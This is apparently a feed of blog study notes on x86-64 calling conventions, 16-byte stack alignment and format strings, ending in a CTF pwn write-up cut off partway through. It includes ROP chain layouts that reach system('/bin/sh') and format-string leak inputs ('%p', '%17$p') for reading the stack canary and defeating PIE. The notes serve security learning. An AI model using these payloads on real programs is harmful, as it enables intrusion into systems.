This is the part that most easily confuses people. According to the **System V ABI** standard:
&gt; **Before** executing the `call` instruction, the stack pointer `RSP` must be 16-byte aligned.

Let’s track how the stack changes:

1. **Before the call**: `RSP` = `0x...00` (16-byte aligned, address ending in 0).
    
2. **Execute `call`**: The CPU automatically pushes the **return address** (8 bytes) onto the stack.
    
    - At this point, `RSP` becomes `0x...F8` (no longer a multiple of 16, offset by 8 bytes).
        
3. **Enter the function body**: The first instruction of the function is usually `push rbp`.
    
    - At this point, `RSP` becomes `0x...F0` (hey! back to being a multiple of 16).
        

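**Conclusion**: The compiler generates the function body on the assumption that `RSP` ends in `8` at the function’s first instruction (the state a normal `call` leaves behind), so that it is aligned again after the prologue. If you arrive at the start of the function by other means (such as a `ret` in a ROP chain), nothing guarantees that assumption.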
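
The three steps above can be traced numerically. The following Python sketch is only a bookkeeping model, not a debugger: the starting value of `RSP` is a made-up address chosen because it ends in `0`, and the helper names `is_aligned` and `trace_call` are hypothetical.

```python
def is_aligned(rsp: int, boundary: int = 16) -> bool:
    """Return True when rsp is a multiple of boundary."""
    return rsp % boundary == 0


def trace_call(rsp_before_call: int) -> dict:
    """Follow RSP through `call` and `push rbp` (each pushes 8 bytes)."""
    after_call = rsp_before_call - 8   # call pushes the return address
    after_push = after_call - 8        # push rbp saves the old frame pointer
    return {
        "before call": rsp_before_call,
        "after call": after_call,
        "after push rbp": after_push,
    }


# Hypothetical stack pointer value, chosen only because it ends in 0.
for stage, rsp in trace_call(0x7FFFFFFFE000).items():
    print(f"{stage:15} rsp={rsp:#x} aligned={is_aligned(rsp)}")
```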

---

### 3. A Pwn player’s nightmare: the alignment pit in a ROP chain

When you build a ROP chain, you are effectively manually “stitching together” return addresses.

**Typical failure case:**

You found the address of `system` and prepared `pop rdi; ret` for argument passing. Your payload looks like this:

`[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]`

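In this process, you skip the normal `call` flow and jump directly into `system` via `ret`, so nothing guarantees the alignment that a `call` would have set up. If `RSP` ends in `0` at the first instruction of `system`, instead of the `8` that a normal `call` leaves behind, every stack slot the function treats as aligned is off by 8 bytes (by the time of the crash, the debugger shows `RSP` ending in `8`), and as soon as `system` executes `movaps` internally, it crashes.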

---

### 4. The ultimate remedy: add one more `ret`

If you find that your ROP chain crashes when calling `system`, and debugging shows it dies on `movaps`, the simplest black magic is: **before calling the target function, insert a useless `ret` instruction.**

**Fixed payload:**

`[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]`

- **Principle**: The essence of `ret` is `pop rip`. Executing one extra `ret` moves `RSP` by 8 bytes, achieving a gorgeous transition “from unaligned to aligned.”
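
To see why one extra `ret` is enough, the sketch below counts how many 8-byte words each chain consumes before `system` starts running. It assumes the vulnerable function was itself entered through a normal `call`, so its saved return address slot ends in `8`. All addresses, the `0x28` padding, and the helpers `p64`, `rsp_at_entry`, and `entry_ok` are illustrative stand-ins (pwntools ships its own `p64`). A function expects `RSP + 8` to be a multiple of 16 at its first instruction.

```python
def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools p64)."""
    return value.to_bytes(8, "little")


def rsp_at_entry(ret_slot: int, chain: list) -> int:
    """RSP when the last chain entry starts running: every word in the chain
    (gadget addresses and popped values alike) has been consumed by then."""
    return ret_slot + 8 * len(chain)


def entry_ok(rsp: int) -> bool:
    """The state right after a normal call: RSP + 8 is a multiple of 16."""
    return (rsp + 8) % 16 == 0


# All addresses below are made up for illustration.
POP_RDI, RET, BINSH, SYSTEM = 0x401233, 0x40101A, 0x404050, 0x401050
RET_SLOT = 0x7FFFFFFFE0E8   # saved return address slot, ends in 8

plain = [POP_RDI, BINSH, SYSTEM]
fixed = [RET] + plain       # same chain with one extra ret in front

for name, chain in (("plain", plain), ("fixed", fixed)):
    payload = b"A" * 0x28 + b"".join(p64(word) for word in chain)
    rsp = rsp_at_entry(RET_SLOT, chain)
    print(name, len(payload), hex(rsp), entry_ok(rsp))
```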

---

### 5. How do you identify it while debugging?
In GDB (for example, using the `pwndbg` plugin), when you crash:
1. Look at the instruction where it crashed: is it something like `movaps XMMWORD PTR [rsp+...], xmm...`?
2. Check the value of `RSP`: is the last digit of the address something other than `0` (for example, `8`)?
3. **Case closed**: if both answers are yes, this is a 16-byte alignment problem.
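
The two checks can be folded into a small triage helper. This is a rough heuristic sketch: the function name and the list of aligned-move mnemonics are assumptions, and it only looks at the text of the faulting instruction plus the value of `RSP` copied from the debugger.

```python
import re


def looks_like_alignment_crash(instruction: str, rsp: int) -> bool:
    """Heuristic: an aligned SSE move on a stack operand while RSP is not
    a multiple of 16."""
    aligned_moves = ("movaps", "movapd", "movdqa")
    mnemonic = instruction.split()[0].lower()
    touches_stack = re.search(r"\[\s*rsp", instruction, re.IGNORECASE) is not None
    return mnemonic in aligned_moves and touches_stack and rsp % 16 != 0


# Values as they might be copied from a crash screen (made up here).
print(looks_like_alignment_crash("movaps XMMWORD PTR [rsp+0x50], xmm0", 0x7FFFFFFFDF48))
```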

---

### Summary Notes

|**State**|**RSP State**|**Notes**|
|---|---|---|
|**Before a standard Call**|Must be aligned (ends in `0`)|Mandatory ABI requirement|
|**After executing Call**|Unaligned (ends in `8`)|Because an 8-byte return address was pushed|
|**Crash after ROP jump**|Usually ends in `8`|Causes SIMD instructions inside `system` to fail|
|**Alignment strategy**|Add one `ret` instruction|Force a shift by 8 bytes to cancel the offset|

**Now you understand why sometimes your payload logic is completely correct, yet you still need to mysteriously add one more `ret` to make it work, right?** Do you want to look at an actual piece of assembly code that causes this kind of crash for this alignment issue, or are you already ready to talk about the “ultimate trick” involving `printf` variadic arguments and registers?</content:encoded></item><item><title>The &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left</title><link>https://goosequill.erina.top/en/blog/202603055950/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603055950/</guid><description>Import notes on the &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left</description><pubDate>Thu, 05 Mar 2026 02:59:00 GMT</pubDate><content:encoded>##  The &quot;Design Trick&quot; Behind Pushing Parameters Onto the Stack from Right to Left

This is a brilliantly clever little &quot;trick&quot; in low-level computer design. We are used to reading from left to right, but the C calling convention pushes arguments onto the stack from right to left. This is entirely to solve a logical paradox: **If I don&apos;t know how many arguments you have, how am I supposed to find the first one?**

---

## 1. The Core Contradiction: The &quot;Fog&quot; of Variadic Arguments

Imagine the definition of the `printf` function:
```c
int printf(const char *format, ...);
```
Here, `...` means the number of arguments is uncertain. When you call `printf(&quot;%d %f %s&quot;, a, b, c)`, at the very moment the function begins running, it actually does not know whether you passed 3 arguments or 300.
The only thing it **definitely** knows is the first argument — the **format string**.

---

## 2. A Stack Layout Diagram for &quot;Right to Left&quot;
Suppose we pass 3 optional arguments through the stack (for simplicity, ignoring register argument passing for now):
`printf(format, a, b, c)`
If they are pushed in **right-to-left order (c -&gt; b -&gt; a -&gt; format)**, and the stack grows downward (from high addresses to low addresses):

| **Memory Address** | **Stored Content** | **Note** |
| --------- | ---------- | -------------- |
| High address | **c** | Last argument |
|           | **b** |                |
|           | **a** |                |
| Low address (RSP) | **format** | **First argument (known)** |

### Why is this &quot;clever&quot;?
With this layout, no matter how many arguments you pass afterward, `format` is always located at `[RSP]` (or at a fixed position above the return address).

After `printf` enters, the first thing it can do is precisely capture `format`. Then it starts parsing the string: when it sees a `%d`, it knows, &quot;Oh, move 8 bytes toward the higher address and I&apos;ll find an integer&quot;; when it sees a `%s`, it moves again toward the higher address.
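
The lookup described above can be modelled with a list standing in for the stack. This is a deliberately tiny sketch under the same simplification as the table (no return address, no register passing); `walk_varargs` is a hypothetical helper that handles only `%d`, `%s`, `%f`, and `%p`.

```python
import re


def walk_varargs(stack: list) -> list:
    """stack[0] models [RSP] and holds the format string; stack[1:] are the
    8-byte slots at increasing addresses left by right-to-left pushing."""
    fmt = stack[0]                       # always at a fixed position
    specs = re.findall(r"%[dsfp]", fmt)  # tiny subset of real conversions
    found = []
    for index, spec in enumerate(specs, start=1):
        # (conversion, byte offset from RSP, value found there)
        found.append((spec, 8 * index, stack[index]))
    return found


print(walk_varargs(["%d %f %s", 42, 3.14, "hello"]))
```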

---

## 3. Thought Experiment: What If the Stack Were Pushed &quot;Left to Right&quot;?
If the order were **format -&gt; a -&gt; b -&gt; c**:
1. `format` would be pushed first and end up at a high address.
2. `c` would be pushed last and end up at the current stack top, `RSP`.

**Disaster strikes:**
When `printf` begins executing, it looks at `RSP`. At that point, `RSP` points to `c`.
But `printf` has no idea whether the current position is `c` or `b` or `format`, because it does not know how much you pushed! It **cannot use a fixed offset** to find the most critical `format` string.

&gt; [!TIP]
&gt; 
&gt; **Conclusion:** Pushing the stack &quot;from right to left&quot; ensures that **the first argument stays fixed near the top of the stack**, giving the function the ability to parse the remaining arguments.

---

## 4. What This Design &quot;Gives&quot; to Pwn
For students studying binary security, this design leads directly to a very famous exploitation technique: the **Format String Vulnerability**.
Since `printf` parses the `%` symbols inside `format` and then blindly goes to the stack (or registers) to find data:
- if you input `%p %p %p %p` as `format`,
- then `printf` will obediently print out data from the stack that it was never supposed to show you in the first place (such as return addresses, canary values, or even function pointers).

This happens because `printf` trusts too much in the &quot;indexing guide&quot; provided by `format`, and the right-to-left stack-pushing rule guarantees that it can always find this &quot;guide.&quot;
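
A toy model makes the leak concrete. In the sketch below, `naive_printf` is a hypothetical stand-in for the real function and `slots` holds made-up values representing whatever happens to sit where the arguments would be. The caller passed no arguments at all, yet every `%p` still gets an answer.

```python
def naive_printf(fmt: str, slots: list) -> str:
    """Render each %p from the next 8-byte slot, with no check on how many
    arguments the caller really passed (which is the whole problem)."""
    out = []
    cursor = 0
    for piece in fmt.split(" "):
        if piece == "%p":
            out.append(hex(slots[cursor]))
            cursor += 1
        else:
            out.append(piece)
    return " ".join(out)


# Made-up slot contents: a stack address, a canary-like value, another
# stack address, and a code address.
slots = [0x7FFFFFFFE1D0, 0xA1B2C3D4E5F60700, 0x7FFFFFFFE200, 0x55555555546F]
print(naive_printf("%p %p %p %p", slots))
```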

---

## Why Load Registers in Reverse Order, from `r9` to `rdi`?
The short answer is: **for registers themselves, there is indeed no hard physical requirement on the order of `mov`.** As long as, at the exact moment the `call` instruction executes, those 6 registers contain the correct values, the CPU is satisfied.
However, there really are a few **&quot;hidden rules&quot;** and bits of **&quot;engineering aesthetics&quot;** here that you may not know:

---

### 1. Why is it often written in reverse? (Mental inertia)
When writing assembly or reading compiler output, you often see the registers loaded in reverse, from `r9` down to `rdi`, mainly for two reasons:
- **A sense of continuity with the stack**: In the 32-bit era, arguments had to be pushed via `push`, and the stack itself was pushed from right to left. Many veteran programmers or compilers subconsciously preserve this rhythm of &quot;handle the last one first, handle the first one last&quot; when writing 64-bit assembly.
- **Protecting RDI/RSI**: In complex functions, `RDI` and `RSI` (the first and second arguments) are usually the most important ones (for example, they may be the starting address of a string). Placing their `mov` last helps prevent accidentally clobbering already computed `RDI` while preparing other arguments (such as calculating the complex logic for the 5th argument).

---

### 2. The Real Hidden Rule: The &quot;Hidden Boss&quot; of Variadic Arguments (the AL Register)
When you call a variadic function like `printf`, besides those 6 registers, there is one extremely important **hidden rule**:
**You must set the `AL` register (the low 8 bits of RAX).**

- **Rule**: For variadic functions, the `AL` register must store **how many vector registers (XMM registers)** were used to pass floating-point values.
    
- **In practice**: If you&apos;re only printing ordinary integers or strings (with no floating-point values involved), you must execute `xor eax, eax` (that is, make `AL = 0`).
    

**If you forget this step:** the program will not necessarily crash, but a variadic function such as `printf` reads `AL` to decide how to handle the XMM argument registers, so a leftover garbage value can lead to undefined behavior. This is one of the easiest traps to fall into when manually constructing a ROP chain in Pwn challenges.

---

### 3. A Required Course for Pwn Players: Ordering Inside a ROP Chain
Although order does not matter in an ordinary `mov` instruction, in the **ROP (Return-Oriented Programming)** chains you care about most, **order is the lifeline**.
When you pass arguments through a Gadget like `pop rdi; ret`, your arguments are stored on the stack. Since `ret` and `pop` consume the stack from low addresses to high, the **physical order** of your ROP chain must match the gadgets exactly, with each gadget address followed immediately by the values it pops:
1. The address of the `pop rdi` gadget, then the value for `rdi`.
2. The address of the `pop rsi` gadget, then the value for `rsi`.

**At this point, you can&apos;t just &quot;write things however you want&quot; — you must arrange your Payload according to the order of the Gadgets you found.**
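
A small emulator shows why the layout cannot be shuffled. The gadget addresses, the `GADGETS` table, and `run_chain` are all hypothetical; the sketch only mimics how `ret` and `pop` walk upward through the payload.

```python
def run_chain(chain: list, gadgets: dict) -> dict:
    """Consume the chain the way ret/pop do: lowest address first."""
    regs = {}
    cursor = 0
    while cursor != len(chain):
        address = chain[cursor]          # ret pops the next gadget address
        cursor += 1
        if address not in gadgets:       # not a gadget: treat it as the final target
            regs["rip"] = address
            break
        for reg in gadgets[address]:     # each pop takes the following word
            regs[reg] = chain[cursor]
            cursor += 1
    return regs


# Hypothetical gadget addresses and the registers they pop before ret.
GADGETS = {0x401233: ["rdi"], 0x401231: ["rsi", "r15"]}
TARGET = 0x401050

chain = [0x401233, 0x1111, 0x401231, 0x2222, 0x0, TARGET]
print(run_chain(chain, GADGETS))
```

Swapping `0x1111` and `0x2222` in the list swaps the values that land in `rdi` and `rsi`, because each value belongs to the gadget address directly below it.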

---

### 4. The &quot;Dependency Trap&quot; Between Registers

Sometimes the order must be fixed because **there are dependencies between registers**.

Look at this example:

```asm
; Wrong example: you want p1 to take its value from p2
mov edi, esi    ; esi has not been initialized yet!
mov esi, 200
```

In this case, you must first `mov esi, 200`, and then `mov edi, esi`. When generating code, the compiler performs **Data Flow Analysis** to ensure that the order of register preparation does not create the awkward situation of &quot;using it before it has been computed.&quot;
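
The same ordering problem can be replayed in a few lines of Python. This is a toy register file, with `None` standing in for an uninitialized register; `run` is a hypothetical helper, not an assembler.

```python
def run(moves: list) -> dict:
    """Apply (dst, src) moves in order; src is a register name or an immediate."""
    regs = {"edi": None, "esi": None}    # None models an uninitialized register
    for dst, src in moves:
        regs[dst] = regs[src] if isinstance(src, str) else src
    return regs


wrong = [("edi", "esi"), ("esi", 200)]   # copies esi before it has a value
right = [("esi", 200), ("edi", "esi")]   # producer first, consumer second

print(run(wrong))
print(run(right))
```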

---

### Summary: Your Checklist of &quot;Hidden Rules&quot;

1. **Freedom**: For ordinary `mov` argument passing, the order is up to you; writing it in forward order is completely fine.
    
2. **AL finisher move**: When calling functions like `printf`, remember `xor eax, eax` (set `AL` to 0).
    
3. **ROP chain**: When constructing an attack payload on the stack, the order is determined by the layout of Gadgets in memory and cannot be misplaced.
    
4. **16-byte alignment**: This is the biggest hidden rule. Before `call`, the value of `RSP` must be divisible by 16, otherwise aligned SSE instructions (even inside `printf`) may trigger a `SIGSEGV` segmentation fault.
    

**Next:**

With this whole &quot;register seating chart&quot; and its hidden rules in place, the natural follow-up is how that **16-byte alignment** ends up causing so much pain.

--&gt; [[16字节对齐]]</content:encoded></item><item><title>When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use</title><link>https://goosequill.erina.top/en/blog/202603054536/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603054536/</guid><description>Import notes for When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use</description><pubDate>Thu, 05 Mar 2026 02:45:00 GMT</pubDate><content:encoded>##  When There Are More Than 6 Parameters, the Memory Stack Is &quot;Forced&quot; Into Use

When a function has more than 6 parameters, the CPU is like a pocket already stuffed full—it no longer has any extra “fast lanes” (registers) to hold new data. At that point, the CPU must rely on its “backup storage”: the **stack**.

In x86-64 Linux (System V ABI), this handling method is called **mixed register-and-stack passing**.

---

## 1. Rule: first 6, then stack

We can think of parameter passing as a priority queue:

1. **The first 6 parameters**: fly “first class” and are stored in `RDI`, `RSI`, `RDX`, `RCX`, `R8`, and `R9` respectively.
    
2. **The 7th and later parameters**: fly “economy class” and are pushed onto the **memory stack** from right to left, so the 7th ends up at the lowest address.
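
The priority queue can be written down directly. The sketch below assumes every argument is an integer or pointer (floating-point arguments use XMM registers and are not modelled); `place_args` is a hypothetical helper.

```python
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def place_args(args: list) -> tuple:
    """Split integer arguments into register assignments and stack pushes."""
    in_regs = dict(zip(INT_ARG_REGS, args))        # zip stops after six
    on_stack = list(args[len(INT_ARG_REGS):])      # 7th argument onward
    push_order = list(reversed(on_stack))          # pushed right to left
    return in_regs, push_order


regs, pushes = place_args([1, 2, 3, 4, 5, 6, 7, 8])
print(regs)
print(pushes)
```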

---

## 2. Deep integration: an on-site experiment with C and assembly

Let’s write a “big function” with 8 parameters and see how the compiler arranges the troops.

### C code

```c
// A function with 8 parameters
void complex_func(int a1, int a2, int a3, int a4, int a5, int a6, int a7, int a8) {
    int sum = a7 + a8; // Focus on the last two parameters
}

int main() {
    complex_func(1, 2, 3, 4, 5, 6, 7, 8);
    return 0;
}
```

### The caller&apos;s (the `main` function&apos;s) assembly logic

Before calling `complex_func`, the assembly instructions become like this:

```asm
; --- Prepare the 7th and 8th parameters (stack) ---
push 8                ; push the 8th parameter
push 7                ; push the 7th parameter

; --- Prepare the first 6 parameters (registers) ---
mov r9d, 6            ; a6
mov r8d, 5            ; a5
mov ecx, 4            ; a4
mov edx, 3            ; a3
mov esi, 2            ; a2
mov edi, 1            ; a1

; --- The actual call ---
call complex_func
```

---

## 3. Stack frame layout: what do the parameters look like?

After the function is called, the stack-top pointer `RSP` changes. From inside `complex_func`, if it wants to find the 7th and 8th parameters, it must look them up in memory:

|**Memory address (relative to RSP)**|**Content**|**Note**|
|---|---|---|
|`[rsp + 0x0]`|**Return address**|Return address automatically pushed by the `call` instruction|
|`[rsp + 0x8]`|**7**|7th parameter (a7)|
|`[rsp + 0x10]`|**8**|8th parameter (a8)|

&gt; [!TIP]
&gt; 
&gt; **Why +0x8 and +0x10?** Because on a 64-bit system, each pushed parameter occupies 8 bytes. The first 8 bytes store the return address used after the function finishes, so parameters must be looked up starting at offset 8.
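
The offsets in the table follow a simple pattern, sketched below. `callee_view` is a hypothetical helper, and it describes the stack at the first instruction of the callee, before any `push rbp`.

```python
def callee_view(stack_args: list) -> dict:
    """Map [rsp + offset] to its content at callee entry."""
    view = {0x0: "return address"}               # pushed by call
    for position, value in enumerate(stack_args):
        view[0x8 * (position + 1)] = value       # 7th arg at +0x8, 8th at +0x10, ...
    return view


for offset, content in callee_view([7, 8]).items():
    print(f"[rsp + {offset:#x}] = {content}")
```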

---

## 4. Why is this crucial for learning Pwn?

For students studying binary security, this is core knowledge for building an **ROP (Return-Oriented Programming)** chain:

1. **Differences in parameter locations**: if the vulnerable function you want to use has only 1–2 parameters (such as `system(&quot;/bin/sh&quot;)`), you only need to look for a gadget like `pop rdi; ret`.
    
2. **Exploiting stack overflows**: if the function you want to use has more than 6 parameters (for example, some complex kernel functions), you cannot rely on controlling registers alone: you must also **control the data layout on the stack**, because the program will read its 7th and later parameters from places like `[rsp + 8]`.
    

This mixed “register + stack” mechanism is actually the ABI’s balance between **speed (registers)** and **generality (the stack can hold however many parameters remain)**.

---

### Advanced thought

Have you ever wondered why function parameters are pushed onto the stack **“from right to left”** (push 8 first, then 7)? This is actually related to a very famous feature in C: **variadic functions** (such as `printf`). Want to talk about the “design trick” behind this?

--&gt; [[参数从右往左压栈道&quot;设计心机&quot;]]</content:encoded></item><item><title>The “Unwritten Rule” of RDI as the First Argument</title><link>https://goosequill.erina.top/en/blog/202603054245/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603054245/</guid><description>Import notes on the “unwritten rule” of RDI as the first argument</description><pubDate>Thu, 05 Mar 2026 02:42:00 GMT</pubDate><content:encoded>##  The “Unwritten Rule” of RDI as the First Argument

This question gets to the core of low-level design. Why is it specifically defined that **RDI** is the first argument and **RSI** is the second? Why not randomly pick two registers instead, such as R8 and R9?

The reasons behind this can mainly be summarized in two points: **the continuation of hardware legacy** and **extreme performance optimization**.

---

## 1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions

In C, the operational logic of many fundamental functions is **“destination $\leftarrow$ source”**. The most typical example is `memcpy(dest, src, size)`.

- **RDI**: the D stands for **Destination**.
    
- **RSI**: the S stands for **Source**.
    

**The brilliance of the design:**

The x86 architecture has some very powerful built-in “string instructions” (such as `movsb`). These instructions are hard-wired into the CPU circuitry, and they **mandate** the use of RSI as the source and RDI as the destination.

If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write `memcpy(dest, src, n)`:

1. `dest` is already in RDI.
    
2. `src` is already in RSI.
    
3. The CPU **does not need** to spend extra time issuing `mov` instructions to swap register values; it can start copying immediately with a single hardware instruction.
    

**Conclusion:** this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.

---

## 2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”

In the old 32-bit (x86) era, function arguments were placed on the **stack**.

- **Drawback**: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.
    

By the 64-bit (x86-64) era, more registers became available. Engineers established a set of rules (the System V ABI) that requires the first 6 integer or pointer arguments to be passed through registers.

**Why this particular order?**

It works like a “standard protocol.” Without such a rule:

- Programmer A might write a function assuming the first argument is in RAX.
    
- Programmer B might write code that passes the argument in RBX.
    
- Result: the program crashes immediately.
    

**The purpose of uniformly specifying RDI, RSI, ...** is to ensure that compilers, operating systems, and code written in different languages can **communicate with each other seamlessly**. It is like everyone agreeing to drive on the right side of the road.

---

## 3. Practical Significance: Impact on Pwn and Reverse Engineering

For students learning binary security (Pwn), understanding this is crucial:

- **Finding gadgets**: when constructing a ROP chain, you often need to control the first argument (for example, `system(&quot;/bin/sh&quot;)`). Since you know the rule is RDI, you will specifically look for instruction snippets like `pop rdi; ret`.
    
- **Quickly locating vulnerabilities**: when you see code in a disassembler (such as IDA) passing a strange address into **RDI** and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”

---

### Summary Comparison Table

|**Dimension**|**Old Era (32-bit/x86)**|**New Era (64-bit/x86-64)**|**Benefits**|
|---|---|---|---|
|**Storage location**|Memory stack (Stack)|**Registers (RDI, RSI...)**|**Fast** (register access is on the nanosecond scale)|
|**Instruction count**|Requires multiple push/pop operations|Simple mov is enough|**Smaller code size** and higher execution efficiency|
|**Logical consistency**|Arbitrary|Strictly follows Dest/Source logic|**Hardware-level optimization**, reducing the cost of data movement|

Would you like to see how the CPU is “forced” to use the memory stack to handle arguments when there are more than 6 of them (and registers are no longer sufficient)?

--&gt; [[参数超过6个时，“被迫”动用内存栈处理]]
--&gt; [[参数从右往左压栈道&quot;设计心机&quot;]]</content:encoded></item><item><title>Index Registers</title><link>https://goosequill.erina.top/en/blog/202603052327/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603052327/</guid><description>Import notes on index registers</description><pubDate>Thu, 05 Mar 2026 02:23:00 GMT</pubDate><content:encoded>##  Index Registers

The best way to understand index registers is to imagine them as **a mover&apos;s “GPS coordinates”**.
In the x86-64 architecture, **RSI** and **RDI** are like a pair of partners: one tells the CPU “where the item is” (source), and the other tells it “where to send it” (destination).

---

## 1. Core Logic: Source and Destination
We can quickly build intuition through a simple comparison table:

| **Register** | **Full Name**             | **Core Role**         | **Real-World Analogy** |
| ------- | ------------------------- | ------------------- | ---------------------- |
| **RSI** | **S**ource **I**ndex      | **Source** operand pointer      | The address of the “supply location” |
| **RDI** | **D**estination **I**ndex | **Destination** operand pointer | The address of the “delivery location” |

&gt; [!NOTE]
&gt; 
&gt; **Changes in modern x86-64**: On 64-bit Linux systems (System V AMD64 ABI), RDI and RSI also have an extremely important identity — **function arguments**.
&gt; 
&gt; - **RDI**: stores the **1st** function argument.
&gt;     
&gt; - **RSI**: stores the **2nd** function argument.

---

## 2. Deep Integration: A C and Assembly Side-by-Side Experiment
To help you fully understand, let&apos;s look at one of the most classic scenarios: **memory copy**.
### C Code
This code implements a simple character copy function: it copies the character pointed to by `src` to `dest`.
```c
void manual_copy(char *dest, const char *src) {
    *dest = *src; // Move the contents at the source address to the destination address
}
```
### Corresponding Assembly Code (x86-64)
When you call `manual_copy(buffer, message)`, the compiler arranges the registers like this:
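```asm
; Assume that on function entry:
; RDI = address of dest (1st argument)
; RSI = address of src  (2nd argument)

manual_copy:
    mov al, [rsi]      ; [Pick up at the source]: read the 1 byte at the address RSI points to into AL
    mov [rdi], al      ; [Deliver to the destination]: write the byte in AL to the address RDI points to
    ret                ; return
```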

---

## 3. Advanced Usage: String Instructions
They are called “index registers” because x86 specifically designed some “fully automatic” instructions. For example, `movsb` (Move String Byte) automatically uses RSI and RDI.
### Bulk Transfer Example
If we want to move 10 bytes at once:
- **C**: `memcpy(dest, src, 10);`
    
- **Assembly instruction**:
    
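```asm
lea rsi, [src_buffer]   ; RSI = start address of the source buffer
lea rdi, [dest_buffer]  ; RDI = start address of the destination buffer
mov rcx, 10             ; set the counter to 10
rep movsb               ; [Automatic transfer]:
                        ; 1. copy the byte at [RSI] to [RDI]
                        ; 2. RSI++, RDI++ (automatically point to the next byte)
                        ; 3. repeat until RCX is 0
```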
Here, the “indexing” nature of RSI and RDI is demonstrated vividly: they are not just addresses, they also **automatically increase as the transfer proceeds**, like conveyor belts in a warehouse moving forward on their own.
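
For readers more comfortable with Python, the behaviour of `rep movsb` can be imitated with a loop over a `bytearray`. This sketch assumes the direction flag is clear, so both registers count upward; `rep_movsb` here is a hypothetical model, and the flat `memory` buffer stands in for real addresses.

```python
def rep_movsb(memory: bytearray, rsi: int, rdi: int, rcx: int) -> tuple:
    """Model rep movsb with the direction flag clear (addresses count upward)."""
    while rcx != 0:
        memory[rdi] = memory[rsi]   # 1. copy one byte from [RSI] to [RDI]
        rsi += 1                    # 2. both index registers advance
        rdi += 1
        rcx -= 1                    # 3. repeat until RCX reaches 0
    return rsi, rdi, rcx


memory = bytearray(b"0123456789" + bytes(10))   # source at 0, destination at 10
print(rep_movsb(memory, rsi=0, rdi=10, rcx=10))
print(memory)
```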

---

## 4. Memory Tricks Summary
- **S**I = **S**tart / **S**ource (where it starts / the source)
- **D**I = **D**estination / **D**one (the destination / where it ends)
When doing reverse engineering or debugging, if you see `rep movs` or a large number of `[rsi]` / `[rdi]` operations, your first reaction should be: **“The CPU is doing a big relocation!”**

Do you want to continue and dig deeper into **calling conventions**? In other words, the “unwritten rule” of why RDI is the first argument and RSI is the second argument.   
--&gt; [[RDI作为第一个参数的“潜规则”]]</content:encoded></item><item><title>[Shenyu Cup 2021]find_flag</title><link>https://goosequill.erina.top/en/blog/202512151812/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512151812/</guid><description>Import notes for [Shenyu Cup 2021]find_flag</description><pubDate>Mon, 15 Dec 2025 10:12:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]

# find_flag - Challenge Write-up

&gt; [!info] Challenge Information
&gt; - **Competition**: Shenyu Cup
&gt; - **Challenge**: find_flag
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Mitigations**: PIE, canary, full protections enabled
&gt; - **Vulnerability Type**: Format string / stack overflow
&gt; - **Exploitation Technique**: ret2text

*Preface:*
This challenge records two points:
- First, it helps me clarify Python data type conversions. Sometimes after leaking data, you still need to convert it into the correct format. Only by mastering Python&apos;s data conversion methods can you adapt flexibly and not ask AI about everything.
- Second, this was my first time solving a PIE challenge, so the method for setting breakpoints is somewhat different.

## Vulnerability Analysis
In this challenge, the format string vulnerability lets us read values off the stack (the canary and a code address), which in turn lets us use the stack overflow in `gets()` to return into the backdoor function. You need to look around a bit to find the backdoor function yourself. If that still doesn&apos;t work, open the Strings window in IDA with `Shift + F12` and follow cross-references from the strings to locate it.

## Solution Steps
### ① Static Analysis
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151847651.png)
These are all obvious vulnerabilities: overflow into the backdoor function, so the exploitation technique is `ret2text`. But the key point of this challenge is how to overflow without crashing the program and how to find the correct overflow point **(PIE protection)**.
Since the idea is clear, we can move to dynamic debugging and find the offset.

### ② Dynamic Debugging  
#### Format string location
About the breakpoint issue:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151856521.png)
One easy-to-remember method is to use `$rebase(offset)`. This is a GDB convenience function provided by pwndbg for PIE binaries. You only need to pass it the offset address from IDA.
```txt
start
b *$rebase(0x13BB)
c
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151901602.png)
```txt
%p..%p..%p..%p..%p..%p..%p..%p..
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151906110.png)
By simply counting, it appears at the 6th position, so `offset = 6`.
#### Canary leak
Next, find the canary&apos;s position on the stack. This is such a basic step that I won&apos;t include screenshots; you can read it straight from IDA.
```txt
char format[32]; // [rsp+0h] [rbp-60h] BYREF
_BYTE buf_0x40[56]; // [rsp+20h] [rbp-40h] BYREF
unsigned __int64 canary; // [rsp+58h] [rbp-8h]
```
$(60\text{h} - 8\text{h}) \div 8 = 58\text{h} \div 8 = 11$, so the canary&apos;s offset is 11 + 6 = 17.
Just run `start` and then enter `%17$p`; the result is the canary.
#### Program base leak
Keep the following distinction in mind:
- **Stack Address** and **Code Address** are two independent memory regions.
- **PIE protection**: randomizes the base address of the code segment (Text Segment).
- **ASLR protection**: usually also randomizes the base address of the stack.

Our format-string leak reads values stored on the stack, so when searching for the program base address, the thing to leak is not a stack address such as the saved RBP, because that is useless for defeating PIE. What we should look for is a stack slot that holds an address in the `.text` segment! Think about where one is guaranteed to exist. What does the `call` instruction do?
With that line of thinking, you naturally arrive at leaking the saved return address (`save_rip`)!

|**Stack Content**|**Offset (relative to RBP)**|**Description**|**Useful for bypassing PIE?**|
|---|---|---|---|
